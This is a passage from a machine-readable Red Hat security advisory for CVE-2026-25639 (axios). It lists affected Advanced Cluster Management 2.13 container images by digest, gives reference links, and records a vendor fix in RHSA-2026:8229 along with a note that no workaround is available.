"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:64930ec82f003294eaf26f6ac59c493e1bfc8c3d7addeb4c5b8f0cfcf458c406_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:753415fcdcc9f6b8685a54d83f4d35d1104d690215125a36d6df2b9873ac6cd3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:c58049e17034c0df635df55fce49cab392af3194f57c03bbb842d7c2acb247e5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0907a51a72f39393da4bdee241333b08b5b5591f1e9a5de7d67ad586d11da59b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:498cdf1888c2ef9f031baafc288323ebd0fe5d9b009cedb1443605cf4153c0c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5ac47e52a78f31b8982de5b9144ec96baab80c78ba8d06d3efabda329e017d36_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:9819517abcb75b516ea0e158ad9cbb0a4ef847f7858531b751c04de5a53527be_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:2ae0730de393d5aeff08a9317fc70459421dd8d6fc7a65f2a9e4a28ae5b64d9d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:62c7b78b2726fd940db4bd435b13f6d07097395b069130b32ea0912c95333555_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8c986374ff8afd980f450877facc2927fdd6f655f3d6b7def6771485d00afeb1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8eeb6a344b773bdc4f50da36c956dbaa50d6474f5c045e92250274d0ed723b39_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:1d7f37fa0146f48291fd1dd12752d0a19c8e87c30e1698492b36274c79051a9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:5c3cc196a8638f6fae7c246ff6746f2f453bbfab8e018683ee297609713664ac_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:e539ec4ab10e81c08d68991e3c77efd43497f4a5561ee1315ff8d467736d245a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:fbc20e8545d4562d05df98d5cfbc91a7a2d802a9d4ff8c0ea733126687c42c26_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:111bbc8fda153d16c384a622dd659c53b8cdc47e495a9fada411a5042954ab6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:433f0b3d09889613d5214ba1c084bdc99bdcbce227fefd10b0d8491442698ea9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:51096baed7d6ed403d88ac2dd935a30313f618b7552fee2b07367db5069601d1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:b3eefeffd90660b8e463f2b06dc5ee2b46e235efae7c13ed893828a6c9598459_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:58a8acff99aaaacdb7c292b615c2ed9a0418d82f75273c1809a6db05811713fa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:661a4a1fb71f36ac1663232ca6e098d1c101dc16168eec7eee471ae11f98f66c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bc06192ce81eac533cb7c080e8aef6587991534cb9b1787537c49753c0985e3d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:e8207895ec9e7006746043cf04fbf1e2897aa30e74b9184665be2ac50f9fe650_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:3074a430dd8bbb0399ce649186cb6140d8525e5b7c1e05b79a4ab74a32d989b8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:34de933b36ee01444cdf4d4a45e47466ef8dad6ab6345134524595c191928ffe_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:8a65d646180c7889d0ba1e3a11fd6796d0020301e4e721575f87585afd8f9dfe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:cf1b6cae5a10aec88554e71be094737b0a17efb07cd1175ca55f1799626f58f2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:036ee3882d4d6536c309d9aacea3dc611785deba3bd998092adcb1ba21664897_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:82914e82513e2f8522589886a5df6681d12c6442ff1b8ef05a21d31c09fa0f0d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:893831b7270214137b2fdf1e55f0175b4ef6de9b8763eaaf0e0a935c8ab1744d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d6e329af2d9c1648006e3fa0b0232562a2bed6e7a33c56e025517f7d9068b5cc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:131918c9878d040c3ec190a9c724a65dbf3bb27f55a0fcac250d92067dc69288_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:327af8db145b9bd6ada1c9f27faa493ce090af412c51dedd7b247e65dcad51fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:721ebc57b91b4f9bcfb25d7b29ee8a2ca60fcb231096af2812f9201778e3ca51_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:ebff3dd368f33d1aec215b947b88f4aa7e821db1577d448b8c6eb4e6ead7fe07_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:6a88ce891e0fc9619e983a5b63fef86f735b8df5eb56909075bd3bbb098dddf8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:7485348cced991c7a4399e21e077ed62b3a118b7093bd4f42f9863d9e0da5c26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:b8d70910405eec4d886b27fc348a982c0b6f906f7f0e65aceecffd9f09fd6602_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:e63891386bfb191cd0e74884cad1f86c462d57e51b9aeec7d9c5073ba4d723f9_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "RHBZ#2438237",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438237"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25639",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25639"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57",
"url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/releases/tag/v1.13.5",
"url": "https://github.com/axios/axios/releases/tag/v1.13.5"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433",
"url": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433"
}
],
"release_date": "2026-02-09T20:11:22.374000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-15T02:15:09+00:00",
"details": "Before you apply this update, make sure all previously released errata\nthat are relevant to your system are applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:0bd1b50f01e6228c56cf07c005ac8ead15d814b09813157b79fcea9292e42551_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:82107bc3ac83308ba96111cc5690a23d116bcd71c7a65face89e4d530b2e8382_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a673e83cb652160fc3db1b69505d21a634a15fcc68f3940bda25f64dc0ae7bb6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a765f440d03be4c90a764f6ec1a2bf2d4c4acb0f8af630aff9811aaa631327ca_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:8229"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:01382838a23f75a6c03b30c68e9e42d72c22d773a4891260c639f7c8b60ffd87_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:1c74aaa66b6be9f5eb1f55851f1cc3f2a3878882c3fc972cd24232e9022f74e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:696d1f7c4b5415e49760f7a66368aa0260284b12b108d5feb560838a9bce8a6f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7328602aa637f1b555ecd56c05d6ade8dbee48fae78a0118b1e39774b8383704_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:3ae25beb920ec77de14769895f60da6a3d83fc41192ca5da5f976076853e5a50_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:c9bf774dfa3f5a66339a86f22961c54b2b41199efd173b016a2c7c57407dae40_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:d1cac9d50ec20e770ae41aa8f90474c269d80e84a9990e2c3e613a892b0c044c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:ddb5d8c476bcc9b6d4a7c0d116a2f5150acbfa80cc890d77d5d90bd496a7860e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:0ffd5a902860aad15377e20b1e6481e6cf746fa3e33509df0f88f93f9a9f8034_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:abcf4d6f42dec254d8b4197282fb449daf13d4724ed23ddc2aafde0328338f74_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b6ea1f6389ad207c45321ab5a36c03949986e74ef9dbf5e3d2fdb2ceb5c4a602_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:e126327d69e48f2844f5beafc34514d31e9f3eed0ac393399edf80cf31a2eabe_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:0f7b1ee143f154e6e33c452f95fd0a0afb7fd020e758a991d18abde990e49e0c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6363dfb96f394aef2b07b3a36c85d3af60dc3594ab615327176ba520704a4356_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:849cf23afa514a1d86073fed2424e487893655510721a0b9c0d4be4cf59bf60b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:a8843c7b628767803f2aa4b2658dc0a932157b20f98507004929036108c7dfb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:428a52072881ee7714539f7721313ca78e06fd0e39ceb8de12f8a0d33fb4cd55_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:5145c15e9fa57bdd1d072e7c88f27d5f8f51caf395e542ad8fb54a098f8c24fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:cb76c81b895dfb5bc384407baf76c5c74d9b509342e665f3d5ff234a40f16236_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:d7dae765d402cd9522c23689fc0e72f47659fc2f1184b8b16c51b6c5c6a2b890_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5af546f1d36b01b320fd950d227cdd8f62a765facc8614ba277fe218c5649e61_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:921a7995304e4648ac2fd0c08bec7d95adc09caca4d6d124cbba4ff8043edf19_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:a0928fa238b82f2c00778064d0f1e52ff507ffef7a0a3756b1f2f2022d375e4b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:fdc436ea03cb2d06976da109061aa0793672c306deef23708ee9e0b39395b6f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:2adb87f4433d9516e2111150bccafbbb8dec179bdf3fe3acd38d7b27411cb666_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:4afad9568dc7dd2d90c396d08d596258e813bb67e2901135b539f279af382e09_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:508d4d8ee312e8d720eeca38f3823438548c5ab1260d8fa822ca49765f7aeef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:a31ab1ae8b4c3ead24f9ce3c913a4754972bd548d6e5b10ca22e61a6d9d3539a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:35ba01a14b8f7a0ed0e79fd9efe48280d26afa10a316daaec512f39cc6839adb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:384d23bb3f4e6fd2425e1b60ded99f027dcbaad14e631ffbe84845821a1c3215_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:a8ca367caa43ec006811fe370fdf440328dd22fc39be11e48f36396b781f36bb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:db8b5776a9dcb4b87a4de948c4c11d0164e66df188f97be6a6fd7e9953f5501e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:1e0a1eadbb77f4f14d48357af6a5b12406ae912210b53c14018b642e4f62d1fe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:4816e73043b8f73143cff29cff41292e62bb36467ba28a260ee46fd43ece915c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71d6b8f5471d7a23918763eeea53d991d98adf170e228348b77d2412ce752751_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:87f2e1ee942b226835c97b7abe43a62802146755141a850137b9ab03dd6fccf6_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:2b6a43ae23126321b9c94b37da646db4943331200434edc6a54be156150065f2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:d24283b13f739561fae6bdfb730922a1d3804422dc41249e33e6084158afcec4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:e9df0b0323447cacad8942ecce2e690a9f498d5cb41b54e3bb55be6614ddaece_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:ed46808dba295cf093aa5caabc9782ee9f044c7e770adaf3657f57f0f6e1aaf9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:5a98450b5f85a75172ca51e2dcf096465635dc2e4c5fedfd74e1fdd665f3fa65_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:7388c812f31ff8f2b1c2653adf07906e2f50c356a1ad9130d3923d835e79e0e7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:bd521270153c8b5b8193e08fe4a7c959e5b9d22ed7e74a87827580974b3836f1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fc3b40899a332c041667de0965d58f50325eaddc8547145a2dff9aede38d69bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0668bbb16723e23ae64e4337a1347a6e0d2854d1c173cbc59c17a829e430bc00_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:177c2cb59b6b43f4ea650bbb603b144ca37aece398635a458d518dd55cae7fb6_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:78b0d35ce4fce4d279ad089ccf284f5e1425f947d95c3c72c5755bb00464305c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:f3b200f2a00217299f66cab9f89de8673003d194292b41157f663799b5c61c3e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:02486920d371f14bcbafc720545c4a6f24523a46483e60c00c7f25f52b3ea476_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1cb3639dfe65b6568b53de130e7b36b8f5ebceedd76c110ddb64fbe860bfde14_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:4124ae57ffa1b26bfc0e68b62c8325c5e17d332dca85b618a4ccba60cf52d1b5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:8243cc9646e4ae89aabf299e476a94124c8244dd54e0fb1c848a6bbbd0c94f62_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:2a64ce4183df6c5743ffa7df7b4192fce192e08eea5e03b76c9b621e5d351d2a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:4e6dd9d24ab247b2a7b84f7842b2a710eee3aa2fce58fc1516ef5bb55e0693f0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:d814b3c076f9ef671d74e156dce5d3f634130904f166a6a04a59df41e8ec07ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:faeaa0d157334dcf9a808ea8916272c9912726580dc0ca06b6e3bb85860772ab_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:2bc6310bd61774d74b1dd0245139b3bfc4940efb1bf424ad0e7a4d822f2271b8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:95baf4ac24b7c9d2fb2883cdf81c7d75f76c8c53aef6745eb732918718877cd4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c17ac85849d3cdf437d09d8ce9581b48a73304498a315db470ec655fdb88f529_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f6dcad139d0a85137a293dd7cf8c68819658d71a1a45914030cfb7d58dac146d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:1ef6867542269af4ce8cee7225dfb4e64680715a1bb34ed510b9fbf84d88fb2d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:58a418395bf71e339145d259b6906172fbc066e17e05071ce983c5615e703075_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:81f72d7522fcc4a0e948e52987671328dcbfd726b54125a23d893cd45e6cbdd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:f4ad6f2ed37be694b95b1c00b32f797cc29a0dab790207a254b4d4f4f2aa7158_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:723dd5b7b166ed9fcedd2f6b2b2567e943ffcfa78bfe7974ac410d629495bc27_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:7f20f9bb4a9b57b618fd864fd49ef0b1a1cb81d20668ba9f1bb2392086d7a144_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b3b5013c3333ed731561416060e14930f276336fb23037c6a7109496faee095e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ccc5e9181f23112628ee91c9acc577627a501af9bb170b2bf0eb0837811e7328_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:0bd1b50f01e6228c56cf07c005ac8ead15d814b09813157b79fcea9292e42551_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:82107bc3ac83308ba96111cc5690a23d116bcd71c7a65face89e4d530b2e8382_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a673e83cb652160fc3db1b69505d21a634a15fcc68f3940bda25f64dc0ae7bb6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a765f440d03be4c90a764f6ec1a2bf2d4c4acb0f8af630aff9811aaa631327ca_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:e8b775e29dbba36821b79231e35017cefd5bb6d245dd1c2d8004150c4998a89c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eaa602fc272af9fce6ea4b2b2e700e24fc29b7fcaad3437abc73f247a5f994aa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:ef6cd34e8f03c566dea492474495c0142a506b973b1a1ae00667de2993c88209_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:fbf35da688ccf2c7049320cee23dcbc518d2787d52c78574ff44e481a38ec20f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:38a4caea83181ce3f04956654ed3e2241a4563718a66ddf09eb0997afe47e0ce_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:54d57a40c0ebc2b7922552aff95b6219c10c4f1b27627d36bc800c1db33a4651_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:8fb71c30e1217f0697c872db2bafbb5e06a7f727c6b508f269512447d6b5118d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:e58abdba80628700eaf2736cb65e6746d2b2126cc7b19ba403c19be5e8a22509_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:83bc597e83bd0756afa67adcbd50858b0d1c23f87b572706e9059dd26055b4a0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:a5ccbff1ad0a3001902044e52590ee18508632bce7822ebf54ba521eaae180eb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:db8ed91f54d683d9d3be3b0747f7429eb95accc8802593dd61d8c24e8a1facfb_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:f3d2daf907e6fd32654d1458c60b134f4d938a933e53161e588bcd94ff6b01df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:0aa9df5f5bf523f7d6d4a9e931a1932e62056d942bf86396d33874adc85a91e8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:4d0252b36a0ca8f522e60e400463b22de506766bdf0c1f65e3e289a3c93002d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:701bc2dd0a441216ea138b677dbf71d497d9b7acaad5f48661117008a8e5defe_amd64",
